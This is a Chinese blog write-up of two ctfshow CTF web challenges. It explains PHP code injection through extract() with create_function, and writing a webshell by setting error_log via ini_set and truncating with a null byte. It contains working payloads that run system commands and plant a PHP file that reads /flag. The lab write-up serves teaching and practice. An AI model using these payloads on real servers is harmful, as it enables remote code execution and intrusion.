ctfshow 限时活动 红包挑战7和红包挑战8详细答案和见解

最新推荐文章于 2024-06-02 15:58:33 发布
最新推荐文章于 2024-06-02 15:58:33 发布
阅读量238 收藏
点赞数
文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73562787/article/details/132285273
版权

 

ctfshow 利用create_function函数,并绕过base64编码

highlight_file(__FILE__);
error_reporting(0);

extract($_GET);
create_function($name,base64_encode($value))();

这里我被迷惑了好久

刚开始的时候觉得extract和create_function这两个函数最可疑,

这里的意思是extract()函数(传进来的必须是数组)来处理$_GET传入的参数,我起初一直在由于为什么,我传入的是value,name而不是value[],name[]为什么可以呢,是我太无知了

原来,在 PHP 中,$_GET 是一个超全局变量用于获取通过 HTTP GET 方法传递的参数。当用户通过 URL 向服务器发送 GET 请求时,URL 中的参数会被解析并存储在 $_GET 数组中。

$_GET 是一个关联数组,其中的键表示 URL 中的参数名,而对应的值则是该参数的值。它本身就是个关联数组,所以我传进去的参数就是这个数组的元素,而经过extract函数的处理是这些元素都变成对应名称的变量。这就豁然开朗了

接下来就是,create_function函数

在这里create_function($name,base64_encode($value))();是一个匿名函数,我们可以把当成这样的函数

nmp(我们自定义的函数名,这是将匿名实例化),这个create_function的用法就是前面一个变量是函数的形参,后面的一整体(记得是整体,而是后面一个单独的变量)是整个这个函数的执行体(也是方法)

那这里我们就可以看出

nmp($name){

base64_encode($value)

}

就是这样一个函数,然后我们进行传参,这里还有一个知识点就是要绕过base64,起初我一直在纠结的是base64指针对大小写字母,数字,+,/这64个字符,然后我一直在想通配符,感觉就很麻烦

看了别人的方法才豁然开朗,原来是可以直接通过闭合来绕过的

假如我name传入的是){}system('ls \');/*的话,那带入就应该是

nmp(){}system('ls \');/*){

base64_encode($value)

}

nmp(){}//空函数体

system('ls \');

/*){

base64_encode($value)

}这样就成功绕过了

ctfshow之利用ini_set设置报错日志,利用%00或\000来截断system致使其报错

highlight_file(__FILE__);
error_reporting(2);


extract($_GET);
ini_set($name,$value);


system(
  "ls '".filter($_GET[1])."'"
);

function filter($cmd){
  $cmd = str_replace("'","",$cmd);
  $cmd = str_replace("\\","",$cmd);
  $cmd = str_replace("`","",$cmd);
  $cmd = str_replace("$","",$cmd);
  return $cmd;
}

这里用了extract函数用于将传入的数组,把数组元素变成相应的变量

这里还有一个ini_set($name,$value);函数

这里用来通过$_GET传参进来的name和value来设置php.ini

然后system(

"ls '".filter($_GET[1])."'"

);

这里的filter是自定义函数,过滤了',\\,`,$

拿道这道题目的时候我是毫无头绪的,就多传入了一个?1=/,然后知道flag应该就再/flag里面

传入1=/usr/local/lib/php/extensions(是php扩展一个常见的默认安装目录)列出 /usr/local/lib/php/extensions/ 目录下的文件和子目录。

no-debug-non-zts-20180731 文件(其实是标识,20180731是特定版本,用于区别不同版本的php扩展库)

那就看看这个路径下有哪些扩展,1=/usr/local/lib/php/extensions/no-debug-non-zts-20180731

有个xdebug.so扩展,

利用:xdebug在处理截断问题的时候,会将异常payload回显

现在就要先从ini_set($name,$value);函数这里思考了, 我们可以利用ini_set函数来暂时修改php.ini中的PHP配置 ,其中这里可以利用的方法是PHP error_log记录日志,这里的name和value是我们可控的, 可以控制PHP配置文件的error_log及其错误日志的写入文件 , xdebug在处理截断问题的时候,会将异常payload回显 ,system可以用0字节(%00和\000)来进行截断

这里可以构造payload:?name=error_log&value=/var/www/html/2.php&1=%00<?php system('cat /flag');?>

因为前面我已经猜测flag 可能再/flag里面

成功写入

访问2.php

caatttz
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
[CTFshow 红包挑战] 刷题记录
rev1ve的博客
12-09 1231
我们已知可控php配置选项,由于不会设置为2不会回显报错,那么我们可以利用error_log函数控制报错信息回显的路径。(说明思路没错),接收action参数进行switch选择判断,如果没找到则跳转main.php,所以我们只需要传参action不为那三个值即可。连接数据库就得执行mysql_helper::get_pdo()方法,然后必须执行application::log_last_user()方法。将cookie值隔开,判断数量是否为2,如果不为2返回null(关键点在这)。
命令执行
jie_a的博客
05-09 386
命令执行文件包含源码1.代码执行如果过滤system如过滤点单引号 和 点过滤了分号 和 括号过滤了include过滤了数字过滤了很多符号利用函数echo print isset unset include requireprint函数变了源代码eval变成include过滤了flag过滤了PHP强制加后缀PHP 并且不回显include变成system需要url编码提交过滤了分号过滤了cat.flag过滤了空格过滤了所有空格过滤了<>函数变成可利用函数 文件包含 源码 if(isset($_G
大年初二红包赛题解
Star's blogs
02-08 491
  首先要超级感谢“灯神”——丁凯朔同学的耐心解答,蟹蟹这位兄dei救我于水火,因此这些感谢的话必须放在C位——最显眼的位置上。你可以不看题解,但必须得瞻仰一下他的大名,没错就是这样哈哈~ 多余的空话不多说,也不会说,但这份感谢是放在心里啦,好兄弟谢谢你!(顺便说一句,zg是我“儿子”,这辈分你懂得~)   1.无聊的hbz (细心审题) 大年初二,走亲戚回来,hbz过于无聊,在网上打...
ctfshow 红包
qq_62046696的博客
08-28 738
其实这几道题都是通过php的扩展来做,还是需要多翻php文档。
CTFshow 限时活动 红包挑战9 详细题解
Jay17的博客
08-24 831
CTFshow 限时活动 红包挑战9 详细题解 集合了目前所有可能的方法,并且加以补充,希望对你有所帮助~
CTFshow 限时活动 红包挑战7、红包挑战8
Jay17的博客
08-14 1231
CTFshow 限时活动 红包挑战7、红包挑战8
ctfshow红包9
lzy15562159122的博客
08-25 140
CTFshow红包题目9讲解
CTFShow--周末大挑战parse_url篇Writeup
Aluxian_的博客
05-15 640
【代码】CTFShow--周末大挑战Writeup。
CTFShow-周末大挑战parse-url篇Writeup
05-19
CTFShow--周末大挑战parse_url篇Writeup
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
CTFSHOW web193 left标注盲注脚本
05-04
其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,包括数据库名、表名、列名和 flag 的值。在获取每个字符时,它会枚举 flag 可能的字符,逐个尝试,直到找到正确的字符为止。最终,它会输出获取到的...
ctfshow-VIP题目-Web-详细解题思路
01-27
ctfshow-VIP题目-Web-详细解题思路
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8261
随着近几天国家网络安全宣传周在全国各地开展活动网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Docker 安全及日志管理
最新发布
2301_77081516的博客
06-02 279
虚拟机通过添加 Hypervisor 层,虚拟出网卡、内存、CPU 等虚拟硬件,再在其上建立虚拟机,每个虚拟机都有自己的系统内核。而 Docker 容器则是通过隔离的方式,将文件系统、 进程、设备、网络等资源进行隔离,再对权限、CPU 资源等进行控制,最终让容器之间互不影响,容器无法影响宿主机。容器与宿主机共享内核、文件系统、硬件等资源。
掌控安全CTF-2024年5月擂台赛-WP(部分)
ASD830的博客
05-27 1126
如果实在没看到的话(或者扫不出来),可以放stegsolve里面看看,red plane 3,够清晰了吧哈哈哈。
企业如何安全的使用U盘
feng_321_的博客
05-29 587
U盘的随意使用可能导致未经授权的人员随意插拔U盘,增加了信息泄露的风险。对于已经确定的内部使用的U盘,可以对U盘进行加密,拷贝到U 盘里面的文件,然后他如果说把U盘拿出去用是需要先格式化的格式化完之后,才可以用。如果员工使用的U盘感染了病毒,那么病毒可能会通过U盘传播到企业的计算机系统中,导致系统瘫痪、数据损坏甚至丢失。:使用专门的设备控制软件,如安秉网盾终端管理系统,可以灵活地管理和控制USB设备的使用权限,指定哪些U盘可以使用,哪些不能使用。员工随意使用U盘可能会导致工作流程混乱,影响工作效率。
助力矿山智能化建设,中海达推出全新安全管控方案
Hi_Target的博客
05-30 708
针对露天矿边坡、尾矿库、采空区地表沉降等问题,采用北斗高精度定位、地基InSAR、激光雷达等技术,实现大范围全覆盖、多源数据融合、自动化监测、实时预警。采用北斗、UWB/蓝牙、音视频、5G等技术,实现露天矿人员、车辆的全方位实时监控、电子围栏告警、指挥调度,提升矿山安全生产管理水平。2008年进入矿山安全监测领域,至今已有十六年的研发、交付和运维经验,实施案例遍布内蒙古、新疆、西藏、云南、广东、福建等多个省市自治区。涉及井上井下,道路分布复杂、人员车辆密集、车辆载重大,易发生地质灾害和人员安全事故。
ctfshow RCE极限挑战
10-20
ctfshow RCE极限挑战是一种CTF比赛中的挑战,要求选手通过注入恶意代码来实现远程代码执行(Remote Code Execution,RCE)。在这个挑战中,选手需要在一个给定的代码中找到漏洞并注入自己的代码,以实现对服务器的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值